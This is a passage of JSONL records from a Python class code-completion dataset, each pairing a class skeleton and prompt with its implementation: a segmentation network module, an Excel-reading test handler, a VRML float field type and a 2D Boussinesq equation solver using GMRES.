(nn.ModuleList): List of layers in the Segmentor module.\"\"\"\n super(Segmentor, self).__init__(parameters)\n self.layer_list = add_conv_block(self.Conv, self.BatchNorm, in_channels=anatomy_factors, out_channels=self.base_filters * 4)\n self.layer_list += add_conv_block(self.Conv, self.BatchNorm, in_channels=self.base_filters * 4, out_channels=self.base_filters * 4)\n self.conv = self.Conv(self.base_filters * 4, self.n_classes, 1, 1, 0)\n self.layers = nn.ModuleList(self.layer_list)\n self.apply(self.weight_init)\n nn.init.xavier_normal_(self.conv.weight.data)\n self.conv.bias.data.zero_()\n\n def weight_init(model):\n \"\"\"Initialize weights for the given model using He (Kaiming) initialization. Args: model (nn.Module): Model for which the weights will be initialized.\"\"\"\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward pass of the Segmentor module. Args: x (torch.Tensor): Input tensor (anatomy factors). Returns: torch.Tensor: Segmentation map output tensor.\"\"\"\n for i, f in enumerate(self.layers):\n if i % 2 == 0:\n x = f(x)\n else:\n x = F.leaky_relu(f(x), 0.2)\n x = F.softmax(self.conv(x), dim=1)\n return x\n", "source": "the_stack_v2_python_sparse", "source_path": "GANDLF/models/sdnet.py", "source_repo": "mlcommons/GaNDLF", "split": "test", "star_events_count": 45} {"blob_id": "4c4cdde8d51657a733b6cadd0cbfae3f28cff9db", "bodies": ["path = os.path.join(settings.data_path, settings.DATA['file_name'])\ntest_data = read_test_data.ReadExcel().read_sheet(path, sheet)\nreturn test_data", "log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\nlogger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\nreturn logger"], "bodies_text": "<|body_start_0|>\n path = os.path.join(settings.data_path, settings.DATA['file_name'])\n test_data = read_test_data.ReadExcel().read_sheet(path, sheet)\n return test_data\n<|end_body_0|>\n\n<|body_start_1|>\n log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\n logger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\n return logger\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MiddleHandler", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MiddleHandler:\n\n def get_test_data(self, sheet):\n \"\"\"读取data.xlsx的结果\"\"\"\n <|body_0|>\n\n def log_init(self):\n \"\"\"log初始化\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n path = os.path.join(settings.data_path, settings.DATA['file_name'])\n test_data = read_test_data.ReadExcel().read_sheet(path, sheet)\n return test_data\n<|end_body_0|>\n\n<|body_start_1|>\n log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\n logger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\n return logger\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000407", "length_bytes": 875, "license_type": "no_license", "methods": [{"docstring": "读取data.xlsx的结果", "name": "get_test_data", "signature": "def get_test_data(self, sheet)"}, {"docstring": "log初始化", "name": "log_init", "signature": "def log_init(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006347", "prompt": "Implement the Python class `MiddleHandler` described below.\n\nClass description:\nImplement the MiddleHandler class.\n\nMethod signatures and docstrings:\n- def get_test_data(self, sheet): 读取data.xlsx的结果\n- def log_init(self): log初始化", "prompted_full_text": "Implement the Python class `MiddleHandler` described below.\n\nClass description:\nImplement the MiddleHandler class.\n\nMethod signatures and docstrings:\n- def get_test_data(self, sheet): 读取data.xlsx的结果\n- def log_init(self): log初始化\n\n<|skeleton|>\nclass MiddleHandler:\n\n def get_test_data(self, sheet):\n \"\"\"读取data.xlsx的结果\"\"\"\n <|body_0|>\n\n def log_init(self):\n \"\"\"log初始化\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n path = os.path.join(settings.data_path, settings.DATA['file_name'])\n test_data = read_test_data.ReadExcel().read_sheet(path, sheet)\n return test_data\n<|end_body_0|>\n\n<|body_start_1|>\n log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\n logger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\n return logger\n<|end_body_1|>\n", "revision_id": "abd4671b88b650a3b21d63ea50ffd5f64578826f", "skeleton": "<|skeleton|>\nclass MiddleHandler:\n\n def get_test_data(self, sheet):\n \"\"\"读取data.xlsx的结果\"\"\"\n <|body_0|>\n\n def log_init(self):\n \"\"\"log初始化\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MiddleHandler:\n def get_test_data(self, sheet):\n \"\"\"读取data.xlsx的结果\"\"\"\n path = os.path.join(settings.data_path, settings.DATA['file_name'])\n test_data = read_test_data.ReadExcel().read_sheet(path, sheet)\n return test_data\n\n def log_init(self):\n \"\"\"log初始化\"\"\"\n log_path = os.path.join(settings.test_log_path, settings.LOG['log_file'])\n logger = test_log.get_log(name=settings.LOG['name'], level=settings.LOG['level'], log_file=log_path)\n return logger\n", "source": "the_stack_v2_python_sparse", "source_path": "middle_handler/middlehandler.py", "source_repo": "wyuuu1210/autotest", "split": "test", "star_events_count": 0} {"blob_id": "76f32816b81a2645b48c5f143d13198f86ec11e7", "bodies": ["try:\n return float(value)\nexcept ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))", "if isinstance(value, float):\n return 1\nreturn 0"], "bodies_text": "<|body_start_0|>\n try:\n return float(value)\n except ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(value, float):\n return 1\n return 0\n<|end_body_1|>\n", "class_docstring": "SFFloat field/event type base-class", "class_name": "_SFFloat", "detected_licenses": ["GPL-1.0-or-later", "MIT", "LicenseRef-scancode-warranty-disclaimer", "LicenseRef-scancode-other-copyleft", "LGPL-2.1-or-later", "GPL-3.0-only", "LGPL-2.0-or-later", "GPL-3.0-or-later"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass _SFFloat:\n \"\"\"SFFloat field/event type base-class\"\"\"\n\n def coerce(self, value):\n \"\"\"Coerce the given value to our type Allowable types: any object with true/false protocol\"\"\"\n <|body_0|>\n\n def check(self, value):\n \"\"\"Check that value is of precisely the expected data type\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n return float(value)\n except ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(value, float):\n return 1\n return 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000408", "length_bytes": 34853, "license_type": "permissive", "methods": [{"docstring": "Coerce the given value to our type Allowable types: any object with true/false protocol", "name": "coerce", "signature": "def coerce(self, value)"}, {"docstring": "Check that value is of precisely the expected data type", "name": "check", "signature": "def check(self, value)"}], "n_methods": 2, "prompt": "Implement the Python class `_SFFloat` described below.\n\nClass description:\nSFFloat field/event type base-class\n\nMethod signatures and docstrings:\n- def coerce(self, value): Coerce the given value to our type Allowable types: any object with true/false protocol\n- def check(self, value): Check that value is of precisely the expected data type", "prompted_full_text": "Implement the Python class `_SFFloat` described below.\n\nClass description:\nSFFloat field/event type base-class\n\nMethod signatures and docstrings:\n- def coerce(self, value): Coerce the given value to our type Allowable types: any object with true/false protocol\n- def check(self, value): Check that value is of precisely the expected data type\n\n<|skeleton|>\nclass _SFFloat:\n \"\"\"SFFloat field/event type base-class\"\"\"\n\n def coerce(self, value):\n \"\"\"Coerce the given value to our type Allowable types: any object with true/false protocol\"\"\"\n <|body_0|>\n\n def check(self, value):\n \"\"\"Check that value is of precisely the expected data type\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n return float(value)\n except ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(value, float):\n return 1\n return 0\n<|end_body_1|>\n", "revision_id": "7f600ad153270feff12aa7aa86d7ed0a49ebc71c", "skeleton": "<|skeleton|>\nclass _SFFloat:\n \"\"\"SFFloat field/event type base-class\"\"\"\n\n def coerce(self, value):\n \"\"\"Coerce the given value to our type Allowable types: any object with true/false protocol\"\"\"\n <|body_0|>\n\n def check(self, value):\n \"\"\"Check that value is of precisely the expected data type\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class _SFFloat:\n \"\"\"SFFloat field/event type base-class\"\"\"\n\n def coerce(self, value):\n \"\"\"Coerce the given value to our type Allowable types: any object with true/false protocol\"\"\"\n try:\n return float(value)\n except ValueError:\n raise ValueError('Attempted to set value for an %s field which is not compatible: %s' % (self.typeName(), repr(value)))\n\n def check(self, value):\n \"\"\"Check that value is of precisely the expected data type\"\"\"\n if isinstance(value, float):\n return 1\n return 0\n", "source": "the_stack_v2_python_sparse", "source_path": "pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/vrml/fieldtypes.py", "source_repo": "alexus37/AugmentedRealityChess", "split": "test", "star_events_count": 1} {"blob_id": "9ee0902d4162d266c48aa9a88e6e3326b20c0c65", "bodies": ["essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\nfor key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\nsuper(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\nself.N = [self.params.nvars[1], self.params.nvars[2]]\nself.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\nself.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\nself.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\nself.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\nself.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\nself.gmres_logger = logging()", "b = rhs.flatten()\ncb = Callback()\nsol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\nif factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\nme = self.dtype_u(self.init)\nme[:] = unflatten(sol, 4, self.N[0], self.N[1])\nreturn me", "fexpl = self.dtype_u(self.init)\ntemp = u.flatten()\ntemp = self.D_upwind.dot(temp)\nfexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\nreturn fexpl", "temp = u.flatten()\ntemp = self.M.dot(temp)\nfimpl = self.dtype_u(self.init)\nfimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\nreturn fimpl", "f = self.dtype_f(self.init)\nf.impl = self.__eval_fimpl(u, t)\nf.expl = self.__eval_fexpl(u, t)\nreturn f", "dtheta = 0.01\nH = 10.0\na = 5.0\nx_c = -50.0\nme = self.dtype_u(self.init)\nme[0, :, :] = 0.0 * self.xx\nme[1, :, :] = 0.0 * self.xx\nme[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\nme[3, :, :] = 0.0 * self.xx\nreturn me"], "bodies_text": "<|body_start_0|>\n essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\n for key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\n super(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\n self.N = [self.params.nvars[1], self.params.nvars[2]]\n self.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\n self.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\n self.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\n self.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\n self.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\n self.gmres_logger = logging()\n<|end_body_0|>\n\n<|body_start_1|>\n b = rhs.flatten()\n cb = Callback()\n sol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\n if factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\n me = self.dtype_u(self.init)\n me[:] = unflatten(sol, 4, self.N[0], self.N[1])\n return me\n<|end_body_1|>\n\n<|body_start_2|>\n fexpl = self.dtype_u(self.init)\n temp = u.flatten()\n temp = self.D_upwind.dot(temp)\n fexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fexpl\n<|end_body_2|>\n\n<|body_start_3|>\n temp = u.flatten()\n temp = self.M.dot(temp)\n fimpl = self.dtype_u(self.init)\n fimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fimpl\n<|end_body_3|>\n\n<|body_start_4|>\n f = self.dtype_f(self.init)\n f.impl = self.__eval_fimpl(u, t)\n f.expl = self.__eval_fexpl(u, t)\n return f\n<|end_body_4|>\n\n<|body_start_5|>\n dtheta = 0.01\n H = 10.0\n a = 5.0\n x_c = -50.0\n me = self.dtype_u(self.init)\n me[0, :, :] = 0.0 * self.xx\n me[1, :, :] = 0.0 * self.xx\n me[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\n me[3, :, :] = 0.0 * self.xx\n return me\n<|end_body_5|>\n", "class_docstring": "Example implementing the 2D Boussinesq equation for different boundary conditions", "class_name": "boussinesq_2d_imex", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass boussinesq_2d_imex:\n \"\"\"Example implementing the 2D Boussinesq equation for different boundary conditions\"\"\"\n\n def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh):\n \"\"\"Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\"\"\"\n <|body_0|>\n\n def solve_system(self, rhs, factor, u0, t):\n \"\"\"Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\"\"\"\n <|body_1|>\n\n def __eval_fexpl(self, u, t):\n \"\"\"Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\"\"\"\n <|body_2|>\n\n def __eval_fimpl(self, u, t):\n \"\"\"Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\"\"\"\n <|body_3|>\n\n def eval_f(self, u, t):\n \"\"\"Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\"\"\"\n <|body_4|>\n\n def u_exact(self, t):\n \"\"\"Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\n for key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\n super(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\n self.N = [self.params.nvars[1], self.params.nvars[2]]\n self.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\n self.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\n self.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\n self.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\n self.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\n self.gmres_logger = logging()\n<|end_body_0|>\n\n<|body_start_1|>\n b = rhs.flatten()\n cb = Callback()\n sol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\n if factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\n me = self.dtype_u(self.init)\n me[:] = unflatten(sol, 4, self.N[0], self.N[1])\n return me\n<|end_body_1|>\n\n<|body_start_2|>\n fexpl = self.dtype_u(self.init)\n temp = u.flatten()\n temp = self.D_upwind.dot(temp)\n fexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fexpl\n<|end_body_2|>\n\n<|body_start_3|>\n temp = u.flatten()\n temp = self.M.dot(temp)\n fimpl = self.dtype_u(self.init)\n fimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fimpl\n<|end_body_3|>\n\n<|body_start_4|>\n f = self.dtype_f(self.init)\n f.impl = self.__eval_fimpl(u, t)\n f.expl = self.__eval_fexpl(u, t)\n return f\n<|end_body_4|>\n\n<|body_start_5|>\n dtheta = 0.01\n H = 10.0\n a = 5.0\n x_c = -50.0\n me = self.dtype_u(self.init)\n me[0, :, :] = 0.0 * self.xx\n me[1, :, :] = 0.0 * self.xx\n me[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\n me[3, :, :] = 0.0 * self.xx\n return me\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000409", "length_bytes": 6164, "license_type": "permissive", "methods": [{"docstring": "Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)", "name": "__init__", "signature": "def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh)"}, {"docstring": "Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh", "name": "solve_system", "signature": "def solve_system(self, rhs, factor, u0, t)"}, {"docstring": "Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS", "name": "__eval_fexpl", "signature": "def __eval_fexpl(self, u, t)"}, {"docstring": "Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS", "name": "__eval_fimpl", "signature": "def __eval_fimpl(self, u, t)"}, {"docstring": "Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts", "name": "eval_f", "signature": "def eval_f(self, u, t)"}, {"docstring": "Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution", "name": "u_exact", "signature": "def u_exact(self, t)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_006108", "prompt": "Implement the Python class `boussinesq_2d_imex` described below.\n\nClass description:\nExample implementing the 2D Boussinesq equation for different boundary conditions\n\nMethod signatures and docstrings:\n- def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh): Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\n- def solve_system(self, rhs, factor, u0, t): Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\n- def __eval_fexpl(self, u, t): Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\n- def __eval_fimpl(self, u, t): Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\n- def eval_f(self, u, t): Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\n- def u_exact(self, t): Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution", "prompted_full_text": "Implement the Python class `boussinesq_2d_imex` described below.\n\nClass description:\nExample implementing the 2D Boussinesq equation for different boundary conditions\n\nMethod signatures and docstrings:\n- def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh): Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\n- def solve_system(self, rhs, factor, u0, t): Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\n- def __eval_fexpl(self, u, t): Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\n- def __eval_fimpl(self, u, t): Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\n- def eval_f(self, u, t): Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\n- def u_exact(self, t): Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\n\n<|skeleton|>\nclass boussinesq_2d_imex:\n \"\"\"Example implementing the 2D Boussinesq equation for different boundary conditions\"\"\"\n\n def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh):\n \"\"\"Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\"\"\"\n <|body_0|>\n\n def solve_system(self, rhs, factor, u0, t):\n \"\"\"Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\"\"\"\n <|body_1|>\n\n def __eval_fexpl(self, u, t):\n \"\"\"Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\"\"\"\n <|body_2|>\n\n def __eval_fimpl(self, u, t):\n \"\"\"Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\"\"\"\n <|body_3|>\n\n def eval_f(self, u, t):\n \"\"\"Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\"\"\"\n <|body_4|>\n\n def u_exact(self, t):\n \"\"\"Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\n for key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\n super(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\n self.N = [self.params.nvars[1], self.params.nvars[2]]\n self.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\n self.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\n self.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\n self.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\n self.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\n self.gmres_logger = logging()\n<|end_body_0|>\n\n<|body_start_1|>\n b = rhs.flatten()\n cb = Callback()\n sol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\n if factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\n me = self.dtype_u(self.init)\n me[:] = unflatten(sol, 4, self.N[0], self.N[1])\n return me\n<|end_body_1|>\n\n<|body_start_2|>\n fexpl = self.dtype_u(self.init)\n temp = u.flatten()\n temp = self.D_upwind.dot(temp)\n fexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fexpl\n<|end_body_2|>\n\n<|body_start_3|>\n temp = u.flatten()\n temp = self.M.dot(temp)\n fimpl = self.dtype_u(self.init)\n fimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fimpl\n<|end_body_3|>\n\n<|body_start_4|>\n f = self.dtype_f(self.init)\n f.impl = self.__eval_fimpl(u, t)\n f.expl = self.__eval_fexpl(u, t)\n return f\n<|end_body_4|>\n\n<|body_start_5|>\n dtheta = 0.01\n H = 10.0\n a = 5.0\n x_c = -50.0\n me = self.dtype_u(self.init)\n me[0, :, :] = 0.0 * self.xx\n me[1, :, :] = 0.0 * self.xx\n me[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\n me[3, :, :] = 0.0 * self.xx\n return me\n<|end_body_5|>\n", "revision_id": "de2cd523411276083355389d7e7993106cedf93d", "skeleton": "<|skeleton|>\nclass boussinesq_2d_imex:\n \"\"\"Example implementing the 2D Boussinesq equation for different boundary conditions\"\"\"\n\n def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh):\n \"\"\"Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\"\"\"\n <|body_0|>\n\n def solve_system(self, rhs, factor, u0, t):\n \"\"\"Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\"\"\"\n <|body_1|>\n\n def __eval_fexpl(self, u, t):\n \"\"\"Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\"\"\"\n <|body_2|>\n\n def __eval_fimpl(self, u, t):\n \"\"\"Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\"\"\"\n <|body_3|>\n\n def eval_f(self, u, t):\n \"\"\"Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\"\"\"\n <|body_4|>\n\n def u_exact(self, t):\n \"\"\"Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class boussinesq_2d_imex:\n \"\"\"Example implementing the 2D Boussinesq equation for different boundary conditions\"\"\"\n\n def __init__(self, problem_params, dtype_u=mesh, dtype_f=imex_mesh):\n \"\"\"Initialization routine Args: problem_params (dict): custom parameters for the example dtype_u: mesh data type (will be passed to parent class) dtype_f: mesh data type wuth implicit and explicit parts (will be passed to parent class)\"\"\"\n essential_keys = ['nvars', 'c_s', 'u_adv', 'Nfreq', 